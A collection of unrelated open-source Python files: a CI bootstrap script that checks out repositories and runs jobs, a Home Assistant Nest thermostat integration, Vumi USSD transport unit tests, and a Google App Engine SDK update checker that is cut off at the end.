if not os.path.exists(root):
os.makedirs(root)
root_dir = os.path.realpath(root)
logging.info('Root: %s', root_dir)
with choose_ssh_key(ssh):
for repo, (branch, pull) in repos.items():
os.chdir(root_dir)
logging.info(
'Checkout: %s %s',
os.path.join(root_dir, repo),
pull and pull or branch)
checkout(call, repo, branch, pull, ssh, git_cache, clean)
if len(repos) > 1: # cd back into the primary repo
os.chdir(root_dir)
os.chdir(repos.main)
class Repos(dict):
"""{"repo": (branch, pull)} dict with a .main attribute."""
main = ''
def __setitem__(self, k, v):
if not self:
self.main = k
return super(Repos, self).__setitem__(k, v)
def parse_repos(args):
"""Convert --repo=foo=this,123:abc,555:ddd into a Repos()."""
repos = args.repo or {}
if not repos and not args.bare:
raise ValueError('--bare or --repo required')
ret = Repos()
if len(repos) != 1:
if args.pull:
raise ValueError('Multi --repo does not support --pull, use --repo=R=branch,p1,p2')
if args.branch:
raise ValueError('Multi --repo does not support --branch, use --repo=R=branch')
elif len(repos) == 1 and (args.branch or args.pull):
repo = repos[0]
if '=' in repo or ':' in repo:
raise ValueError('--repo cannot contain = or : with --branch or --pull')
ret[repo] = (args.branch, args.pull)
return ret
for repo in repos:
mat = re.match(r'([^=]+)(=([^:,~^\s]+(:[0-9a-fA-F]+)?(,|$))+)?$', repo)
if not mat:
raise ValueError('bad repo', repo, repos)
this_repo = mat.group(1)
if not mat.group(2):
ret[this_repo] = ('master', '')
continue
commits = mat.group(2)[1:].split(',')
if len(commits) == 1:
# Checking out a branch, possibly at a specific commit
ret[this_repo] = (commits[0], '')
continue
# Checking out one or more PRs
ret[this_repo] = ('', ','.join(commits))
return ret
def bootstrap(args):
"""Clone repo at pull/branch into root and run job script."""
# pylint: disable=too-many-locals,too-many-branches,too-many-statements
job = args.job
repos = parse_repos(args)
upload = args.upload
use_json = args.json
build_log_path = os.path.abspath('build-log.txt')
build_log = setup_logging(build_log_path)
started = time.time()
if args.timeout:
end = started + args.timeout * 60
else:
end = 0
call = lambda *a, **kw: _call(end, *a, **kw)
gsutil = GSUtil(call)
logging.info('Bootstrap %s...', job)
build = build_name(started)
if upload:
if repos and repos[repos.main][1]: # merging commits, a pr
paths = pr_paths(upload, repos, job, build)
else:
paths = ci_paths(upload, job, build)
logging.info('Gubernator results at %s', gubernator_uri(paths))
version = 'unknown'
exc_type = None
setup_creds = False
try:
setup_root(call, args.root, repos, args.ssh, args.git_cache, args.clean)
logging.info('Configure environment...')
if repos:
version = find_version(call)
else:
version = ''
setup_magic_environment(job)
setup_credentials(call, args.service_account, upload)
setup_creds = True
logging.info('Start %s at %s...', build, version)
if upload:
start(gsutil, paths, started, node(), version, repos)
success = False
try:
call(job_script(job, use_json))
logging.info('PASS: %s', job)
success = True
except subprocess.CalledProcessError:
logging.error('FAIL: %s', job)
except Exception: # pylint: disable=broad-except
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.exception('unexpected error')
success = False
if not setup_creds:
setup_credentials(call, args.service_account, upload)
if upload:
logging.info('Upload result and artifacts...')
logging.info('Gubernator results at %s', gubernator_uri(paths))
try:
finish(gsutil, paths, success, '_artifacts', build, version, repos, call)
except subprocess.CalledProcessError: # Still try to upload build log
success = False
logging.getLogger('').removeHandler(build_log)
build_log.close()
if upload:
gsutil.copy_file(paths.build_log, build_log_path)
if exc_type:
raise exc_type, exc_value, exc_traceback # pylint: disable=raising-bad-type
if not success:
# TODO(fejta/spxtr): we should distinguish infra and non-infra problems
# by exit code and automatically retrigger after an infra-problem.
sys.exit(1)
def parse_args(arguments=None):
"""Parse arguments or sys.argv[1:]."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--json',
nargs='?', const=1, default=0,
type=int, help='--job is a json key, not a .sh')
parser.add_argument('--root', default='.', help='Root dir to work with')
parser.add_argument(
'--timeout', type=float, default=0, help='Timeout in minutes if set')
parser.add_argument(
'--pull',
help='Deprecated, use --repo=k8s.io/foo=master:abcd,12:ef12,45:ff65')
parser.add_argument(
'--branch',
help='Deprecated, use --repo=k8s.io/foo=master')
parser.add_argument(
'--repo',
action='append',
help='Fetch the specified repositories, with the first one considered primary')
parser.add_argument(
'--bare',
action='store_true',
help='Do not check out a repository')
parser.add_argument('--job', required=True, help='Name of the job to run')
parser.add_argument(
'--upload',
help='Upload results here if set, requires --service-account')
parser.add_argument(
'--service-account',
help='Activate and use path/to/service-account.json if set.')
parser.add_argument(
'--ssh',
help='Use the ssh key to fetch the repository instead of https if set.')
parser.add_argument(
'--git-cache',
help='Location of the git cache.')
parser.add_argument(
'--clean',
action='store_true',
help='Clean the git repo before running tests.')
args = parser.parse_args(arguments)
if bool(args.repo) == bool(args.bare):
raise argparse.ArgumentTypeError(
'Expected --repo xor --bare:', args.repo, args.bare)
return args
if __name__ == '__main__':
ARGS = parse_args()
bootstrap(ARGS)
|
|
"""
Support for Nest thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.nest/
"""
import logging
import voluptuous as vol
from homeassistant.components.nest import (
DATA_NEST, SIGNAL_NEST_UPDATE, DOMAIN as NEST_DOMAIN)
from homeassistant.components.climate import (
STATE_AUTO, STATE_COOL, STATE_HEAT, STATE_ECO, ClimateDevice,
PLATFORM_SCHEMA, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW,
ATTR_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE, SUPPORT_AWAY_MODE, SUPPORT_FAN_MODE)
from homeassistant.const import (
TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_SCAN_INTERVAL, STATE_ON, STATE_OFF)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
DEPENDENCIES = ['nest']
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL):
vol.All(vol.Coerce(int), vol.Range(min=1)),
})
NEST_MODE_HEAT_COOL = 'heat-cool'
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Nest thermostat.
No longer in use.
"""
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the Nest climate device based on a config entry."""
temp_unit = hass.config.units.temperature_unit
thermostats = await hass.async_add_job(hass.data[DATA_NEST].thermostats)
all_devices = [NestThermostat(structure, device, temp_unit)
for structure, device in thermostats]
async_add_entities(all_devices, True)
class NestThermostat(ClimateDevice):
"""Representation of a Nest thermostat."""
def __init__(self, structure, device, temp_unit):
"""Initialize the thermostat."""
self._unit = temp_unit
self.structure = structure
self.device = device
self._fan_list = [STATE_ON, STATE_AUTO]
# Set the default supported features
self._support_flags = (SUPPORT_TARGET_TEMPERATURE |
SUPPORT_OPERATION_MODE | SUPPORT_AWAY_MODE)
# Not all nest devices support cooling and heating remove unused
self._operation_list = [STATE_OFF]
# Add supported nest thermostat features
if self.device.can_heat:
self._operation_list.append(STATE_HEAT)
if self.device.can_cool:
self._operation_list.append(STATE_COOL)
if self.device.can_heat and self.device.can_cool:
self._operation_list.append(STATE_AUTO)
self._support_flags = (self._support_flags |
SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW)
self._operation_list.append(STATE_ECO)
# feature of device
self._has_fan = self.device.has_fan
if self._has_fan:
self._support_flags = (self._support_flags | SUPPORT_FAN_MODE)
# data attributes
self._away = None
self._location = None
self._name = None
self._humidity = None
self._target_temperature = None
self._temperature = None
self._temperature_scale = None
self._mode = None
self._fan = None
self._eco_temperature = None
self._is_locked = None
self._locked_temperature = None
self._min_temperature = None
self._max_temperature = None
@property
def should_poll(self):
"""Do not need poll thanks using Nest streaming API."""
return False
async def async_added_to_hass(self):
"""Register update signal handler."""
async def async_update_state():
"""Update device state."""
await self.async_update_ha_state(True)
async_dispatcher_connect(self.hass, SIGNAL_NEST_UPDATE,
async_update_state)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def unique_id(self):
"""Return unique ID for this device."""
return self.device.serial
@property
def device_info(self):
"""Return information about the device."""
return {
'identifiers': {
(NEST_DOMAIN, self.device.device_id),
},
'name': self.device.name_long,
'manufacturer': 'Nest Labs',
'model': "Thermostat",
'sw_version': self.device.software_version,
}
@property
def name(self):
"""Return the name of the nest, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._temperature_scale
@property
def current_temperature(self):
"""Return the current temperature."""
return self._temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
if self._mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
return self._mode
if self._mode == NEST_MODE_HEAT_COOL:
return STATE_AUTO
return None
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._mode not in (NEST_MODE_HEAT_COOL, STATE_ECO):
return self._target_temperature
return None
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self._mode == STATE_ECO:
return self._eco_temperature[0]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[0]
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self._mode == STATE_ECO:
return self._eco_temperature[1]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[1]
return None
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
def set_temperature(self, **kwargs):
"""Set new target temperature."""
import nest
temp = None
target_temp_low = kwargs.get(ATTR_TARGET_TEMP_LOW)
target_temp_high = kwargs.get(ATTR_TARGET_TEMP_HIGH)
if self._mode == NEST_MODE_HEAT_COOL:
if target_temp_low is not None and target_temp_high is not None:
temp = (target_temp_low, target_temp_high)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
else:
temp = kwargs.get(ATTR_TEMPERATURE)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
try:
if temp is not None:
self.device.target = temp
except nest.nest.APIError as api_error:
_LOGGER.error("An error occurred while setting temperature: %s",
api_error)
# restore target temperature
self.schedule_update_ha_state(True)
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
if operation_mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
device_mode = operation_mode
elif operation_mode == STATE_AUTO:
device_mode = NEST_MODE_HEAT_COOL
else:
device_mode = STATE_OFF
_LOGGER.error(
"An error occurred while setting device mode. "
"Invalid operation mode: %s", operation_mode)
self.device.mode = device_mode
@property
def operation_list(self):
"""List of available operation modes."""
return self._operation_list
def turn_away_mode_on(self):
"""Turn away on."""
self.structure.away = True
def turn_away_mode_off(self):
"""Turn away off."""
self.structure.away = False
@property
def current_fan_mode(self):
"""Return whether the fan is on."""
if self._has_fan:
# Return whether the fan is on
return STATE_ON if self._fan else STATE_AUTO
# No Fan available so disable slider
return None
@property
def fan_list(self):
"""List of available fan modes."""
if self._has_fan:
return self._fan_list
return None
def set_fan_mode(self, fan_mode):
"""Turn fan on/off."""
if self._has_fan:
self.device.fan = fan_mode.lower()
@property
def min_temp(self):
"""Identify min_temp in Nest API or defaults if not available."""
return self._min_temperature
@property
def max_temp(self):
"""Identify max_temp in Nest API or defaults if not available."""
return self._max_temperature
def update(self):
"""Cache value from Python-nest."""
self._location = self.device.where
self._name = self.device.name
self._humidity = self.device.humidity
self._temperature = self.device.temperature
self._mode = self.device.mode
self._target_temperature = self.device.target
self._fan = self.device.fan
self._away = self.structure.away == 'away'
self._eco_temperature = self.device.eco_temperature
self._locked_temperature = self.device.locked_temperature
self._min_temperature = self.device.min_temperature
self._max_temperature = self.device.max_temperature
self._is_locked = self.device.is_locked
if self.device.temperature_scale == 'C':
self._temperature_scale = TEMP_CELSIUS
else:
self._temperature_scale = TEMP_FAHRENHEIT
|
|
from twisted.internet.defer import inlineCallbacks, returnValue
from vumi.utils import http_request_full
from vumi.message import TransportUserMessage
from vumi.transports.mtech_ussd import MtechUssdTransport
from vumi.transports.mtech_ussd.mtech_ussd import MtechUssdResponse
from vumi.transports.tests.helpers import TransportHelper
from vumi.tests.helpers import VumiTestCase
class TestMtechUssdTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.config = {
'transport_type': 'ussd',
'ussd_string_prefix': '*120*666#',
'web_path': "/foo",
'web_host': "127.0.0.1",
'web_port': 0,
'username': 'testuser',
'password': 'testpass',
}
self.tx_helper = self.add_helper(TransportHelper(MtechUssdTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url().rstrip('/')
self.url = "%s%s" % (self.transport_url, self.config['web_path'])
yield self.transport.session_manager.redis._purge_all() # just in case
def make_ussd_request_full(self, session_id, **kwargs):
lines = [
'<?xml version="1.0" encoding="UTF-8"?>',
'<page version="2.0">',
' <session_id>%s</session_id>' % (session_id,),
]
for k, v in kwargs.items():
lines.append(' <%s>%s</%s>' % (k, v, k))
lines.append('</page>')
data = '\n'.join(lines)
return http_request_full(self.url, data, method='POST')
def make_ussd_request(self, session_id, **kwargs):
return self.make_ussd_request_full(session_id, **kwargs).addCallback(
lambda r: r.delivered_body)
@inlineCallbacks
def reply_to_message(self, content, **kw):
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
yield self.tx_helper.make_dispatch_reply(msg, content, **kw)
returnValue(msg)
@inlineCallbacks
def test_empty_request(self):
response = yield http_request_full(self.url, "", method='POST')
self.assertEqual(response.code, 400)
@inlineCallbacks
def test_bad_request(self):
response = yield http_request_full(self.url, "blah", method='POST')
self.assertEqual(response.code, 400)
@inlineCallbacks
def test_inbound_new_continue(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response_d = self.make_ussd_request(
sid, mobile_number='2348085832481', page_id='0',
data='testmenu', gate='gateid')
msg = yield self.reply_to_message("OK\n1 < 2")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_NEW)
self.assertEqual(msg['from_addr'], '2348085832481')
# self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'testmenu')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK<br />1 < 2</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_resume_continue(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_nack(self):
msg = yield self.tx_helper.make_dispatch_outbound("outbound")
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'],
'Missing in_reply_to, content or session_id')
@inlineCallbacks
def test_inbound_missing_session(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response = yield self.make_ussd_request_full(
sid, page_id="indexX", data="foo")
self.assertEqual(400, response.code)
self.assertEqual('', response.delivered_body)
@inlineCallbacks
def test_inbound_new_and_resume(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response_d = self.make_ussd_request(
sid, mobile_number='2348085832481', page_id='0',
data='testmenu', gate='gateid')
msg = yield self.reply_to_message("OK\n1 < 2")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_NEW)
self.assertEqual(msg['from_addr'], '2348085832481')
# self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'testmenu')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK<br />1 < 2</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
self.tx_helper.clear_all_dispatched()
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], 'gateid')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_resume_close(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK", continue_session=False)
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_cancel(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response = yield self.make_ussd_request(sid, status="1")
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'</page>',
])
self.assertEqual(response, correct_response)
class TestMtechUssdResponse(VumiTestCase):
def setUp(self):
self.mur = MtechUssdResponse("sid123")
def assert_message_xml(self, *lines):
xml_str = ''.join(
["<?xml version='1.0' encoding='UTF-8'?>"] + list(lines))
self.assertEqual(self.mur.to_xml(), xml_str)
def test_empty_response(self):
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'</page>')
def test_free_text(self):
self.mur.add_text("Please enter your name")
self.mur.add_freetext_option()
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<div>Please enter your name</div>',
'<navigation><link accesskey="*" pageId="indexX" /></navigation>',
'</page>')
def test_menu_options(self):
self.mur.add_text("Please choose:")
self.mur.add_menu_item('chicken', '1')
self.mur.add_menu_item('beef', '2')
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<div>Please choose:</div>',
'<navigation>',
'<link accesskey="1" pageId="index1">chicken</link>',
'<link accesskey="2" pageId="index2">beef</link>',
'</navigation>',
'</page>')
def test_menu_options_title(self):
self.mur.add_title("LUNCH")
self.mur.add_text("Please choose:")
self.mur.add_menu_item('chicken', '1')
self.mur.add_menu_item('beef', '2')
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<title>LUNCH</title>',
'<div>Please choose:</div>',
'<navigation>',
'<link accesskey="1" pageId="index1">chicken</link>',
'<link accesskey="2" pageId="index2">beef</link>',
'</navigation>',
'</page>')
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Checks for SDK updates."""
import datetime
import logging
import os
import socket
import ssl
import sys
import time
import urllib2
import google
import yaml
from google.appengine.api import validation
from google.appengine.api import yaml_object
VERSION_FILE = '../../VERSION'
UPDATE_CHECK_TIMEOUT = 3
NAG_FILE = '.appcfg_nag'
class NagFile(validation.Validated):
"""A validated YAML class to represent the user's nag preferences.
Attributes:
timestamp: The timestamp of the last nag.
opt_in: True if the user wants to check for updates on dev_appserver
start. False if not. May be None if we have not asked the user yet.
"""
ATTRIBUTES = {
'timestamp': validation.TYPE_FLOAT,
'opt_in': validation.Optional(validation.TYPE_BOOL),
}
@staticmethod
def Load(nag_file):
"""Load a single NagFile object where one and only one is expected.
Args:
nag_file: A file-like object or string containing the yaml data to parse.
Returns:
A NagFile instance.
"""
return yaml_object.BuildSingleObject(NagFile, nag_file)
def GetVersionObject():
"""Gets the version of the SDK by parsing the VERSION file.
Returns:
A Yaml object or None if the VERSION file does not exist.
"""
version_filename = os.path.join(os.path.dirname(google.appengine.__file__),
VERSION_FILE)
try:
version_fh = open(version_filename)
except IOError:
logging.error('Could not find version file at %s', version_filename)
return None
try:
version = yaml.safe_load(version_fh)
finally:
version_fh.close()
return version
def _VersionList(release):
"""Parse a version string into a list of ints.
Args:
release: The 'release' version, e.g. '1.2.4'.
(Due to YAML parsing this may also be an int or float.)
Returns:
A list of ints corresponding to the parts of the version string
between periods. Example:
'1.2.4' -> [1, 2, 4]
'1.2.3.4' -> [1, 2, 3, 4]
Raises:
ValueError if not all the parts are valid integers.
"""
return [int(part) for part in str(release).split('.')]
class SDKUpdateChecker(object):
"""Determines if the local SDK is the latest version.
Nags the user when there are updates to the SDK. As the SDK becomes
more out of date, the language in the nagging gets stronger. We
store a little yaml file in the user's home directory so that we nag
the user only once a week.
The yaml file has the following field:
'timestamp': Last time we nagged the user in seconds since the epoch.
Attributes:
rpcserver: An AbstractRpcServer instance used to check for the latest SDK.
config: The app's AppInfoExternal. Needed to determine which api_version
the app is using.
"""
def __init__(self,
rpcserver,
configs):
"""Create a new SDKUpdateChecker.
Args:
rpcserver: The AbstractRpcServer to use.
configs: A list of yaml objects or a single yaml object that specify the
configuration of this application.
"""
if not isinstance(configs, list):
configs = [configs]
self.rpcserver = rpcserver
self.runtimes = set(config.runtime for config in configs)
self.runtime_to_api_version = {}
for config in configs:
self.runtime_to_api_version.setdefault(
config.runtime, set()).add(config.api_version)
@staticmethod
def MakeNagFilename():
"""Returns the filename for the nag file for this user."""
user_homedir = os.path.expanduser('~/')
if not os.path.isdir(user_homedir):
drive, unused_tail = os.path.splitdrive(os.__file__)
if drive:
os.environ['HOMEDRIVE'] = drive
return os.path.expanduser('~/' + NAG_FILE)
def _ParseVersionFile(self):
"""Parse the local VERSION file.
Returns:
A Yaml object or None if the file does not exist.
"""
return GetVersionObject()
def CheckSupportedVersion(self):
"""Determines if the app's api_version is supported by the SDK.
Uses the api_version field from the AppInfoExternal to determine if
the SDK supports that api_version.
Raises:
sys.exit if the api_version is not supported.
"""
version = self._ParseVersionFile()
if version is None:
logging.error('Could not determine if the SDK supports the api_version '
'requested in app.yaml.')
return
unsupported_api_versions_found = False
for runtime, api_versions in self.runtime_to_api_version.items():
supported_api_versions = _GetSupportedApiVersions(version, runtime)
unsupported_api_versions = sorted(api_versions -
set(supported_api_versions))
if unsupported_api_versions:
unsupported_api_versions_found = True
if len(unsupported_api_versions) == 1:
logging.critical('The requested api_version (%s) is not supported by '
'the %s runtime in this release of the SDK. The '
'supported api_versions are %s.',
unsupported_api_versions[0], runtime,
supported_api_versions)
else:
logging.critical('The requested api_versions (%s) are not supported '
'by the %s runtime in this release of the SDK. The '
'supported api_versions are %s.',
unsupported_api_versions, runtime,
supported_api_versions)
if unsupported_api_versions_found:
sys.exit(1)
def CheckForUpdates(self):
"""Queries the server for updates and nags the user if appropriate.
Queries the server for the latest SDK version at the same time reporting
the local SDK version. The server will respond with a yaml document
containing the fields:
'release': The name of the release (e.g. 1.2).
'timestamp': The time the release was created (YYYY-MM-DD HH:MM AM/PM TZ).
'api_versions': A list of api_version strings (e.g. ['1', 'beta']).
We will nag the user with increasing severity if:
- There is a new release.
- There is a new release with a new api_version.
- There is a new release that does not support an api_version named in
a configuration in self.configs.
"""
version = self._ParseVersionFile()
if version is None:
logging.info('Skipping update check')
return
logging.info('Checking for updates to the SDK.')
responses = {}
try:
for runtime in self.runtimes:
responses[runtime] = yaml.safe_load(self.rpcserver.Send(
'/api/updatecheck',
timeout=UPDATE_CHECK_TIMEOUT,
release=version['release'],
timestamp=version['timestamp'],
api_versions=version['api_versions'],
runtime=runtime))
except (urllib2.URLError, socket.error, ssl.SSLError), e:
logging.info('Update check failed: %s', e)
return
try:
latest = sorted(responses.values(), reverse=True,
key=lambda release: _VersionList(release['release']))[0]
except ValueError:
logging.warn('Could not parse this release version')
if version['release'] == latest['release']:
logging.info('The SDK is up to date.')
return
try:
this_release = _VersionList(version['release'])
except ValueError:
logging.warn('Could not parse this release version (%r)',
version['release'])
else:
try:
advertised_release = _VersionList(latest['release'])
except ValueError:
logging.warn('Could not parse advertised release version (%r)',
latest['release'])
else:
if this_release > advertised_release:
logging.info('This SDK release is newer than the advertised release.')
return
for runtime, response in responses.items():
api_versions = _GetSupportedApiVersions(response, runtime)
obsolete_versions = sorted(
self.runtime_to_api_version[runtime] - set(api_versions))
if len(obsolete_versions) == 1:
self._Nag(
'The api version you are using (%s) is obsolete! You should\n'
'upgrade your SDK and test that your code works with the new\n'
'api version.' % obsolete_versions[0],
response, version, force=True)
elif obsolete_versions:
self._Nag(
'The api versions you are using (%s) are obsolete! You should\n'
'upgrade your SDK and test that your code works with the new\n'
'api version.' % obsolete_versions,
response, version, force=True)
deprecated_versions = sorted(
self.runtime_to_api_version[runtime].intersection(api_versions[:-1]))
if len(deprecated_versions) == 1:
self._Nag(
'The api version you are using (%s) is deprecated. You should\n'
'upgrade your SDK to try the new functionality.' %
deprecated_versions[0], response, version)
elif deprecated_versions:
self._Nag(
'The api versions you are using (%s) are deprecated. You should\n'
'upgrade your SDK to try the new functionality.' %
deprecated_versions, response, version)
self._Nag('There is a new release of the SDK available.',
latest, version)
def _ParseNagFile(self):
"""Parses the nag file.
Returns:
A NagFile if the file was present else None.
"""
nag_filename = SDKUpdateChecker.MakeNagFilename()
try:
fh = open(nag_filename)
except IOError:
return None
try:
nag = NagFile.Load(fh)
finally:
fh.close()
return nag
def _WriteNagFile(self, nag):
"""Writes the NagFile to the user's nag file.
If the destination path does not exist, this method will log an error
and fail silently.
Args:
nag: The NagFile to write.
"""
nagfilename = SDKUpdateChecker.MakeNagFilename()
try:
fh = open(nagfilename, 'w')
try:
fh.write(nag.ToYAML())
finally:
fh.close()
except (OSError, IOError), e:
logging.error('Could not write nag file to %s. Error: %s', nagfilename, e)
def _Nag(self, msg, latest, version, force=False):
"""Prints a nag message and updates the nag file's timestamp.
Because we don't want to nag the user everytime, we store a simple
yaml document in the user's home directory. If the timestamp in this
doc is over a week old, we'll nag the user. And when we nag the user,
we update the timestamp in this doc.
Args:
msg: The formatted message to print to the user.
latest: The yaml document received from the server.
version: The local yaml version document.
force: If True, always nag the user, ignoring the nag file.
"""
nag = self._ParseNagFile()
if nag and not force:
last_nag = datetime.datetime.fromtimestamp(nag.timestamp)
if datetime.datetime.now() - last_nag < datetime.timedelta(weeks=1):
logging.debug('Skipping nag message')
return
if nag is None:
nag = NagFile()
nag.timestamp = time.time()
self._WriteNagFile(nag)
print '****************************************************************'
print msg
print '-----------'
print 'Latest SDK:'
print yaml.dump(latest)
print '-----------'
print 'Your SDK:'
print yaml.dump(version)
print '-----------'
print 'Please visit https://developers.google.com/appengine/downloads'
print 'for the latest SDK'
print '****************************************************************'
def AllowedToCheckForUpdates(self, input_fn=raw_input):
"""Determines if the user wants to check for updates.
On startup, the dev_appserver wants to check for updates to the SDK.
Because this action reports usage to Google when the user is not
otherwise communicating with Google (e.g. pushing a new app version),
the user must opt in.
If the user does not have a nag file, we will query the user and
save the response in the nag file. Subsequent calls to this function
will re-use that response.
Args:
input_fn: used to collect user input. This is for testing only.
Returns:
True if the user wants to check for updates. False otherwise.
"""
nag = self._ParseNagFile()
if nag is None:
nag = NagFile()
nag.timestamp = 0.0
if nag.opt_in is None:
answer = input_fn('Allow dev_appserver to check for updates on startup? '
'(Y/n): ')
answer = answer.strip().lower()
if answer == 'n' or answer == 'no':
print ('dev_appserver will not check for updates on startup. To '
'change this setting, edit %s' %
SDKUpdateChecker.MakeNagFilename())
nag.opt_in = False
else:
print ('dev_appserver will check for updates on startup. To change '
'this setting, edit %s' % SDKUpdateChecker.MakeNagFilename())
nag.opt_in = True
self._WriteNagFile(nag)
return nag.opt_in
def _GetSupportedApiVersions(versions, runtime):
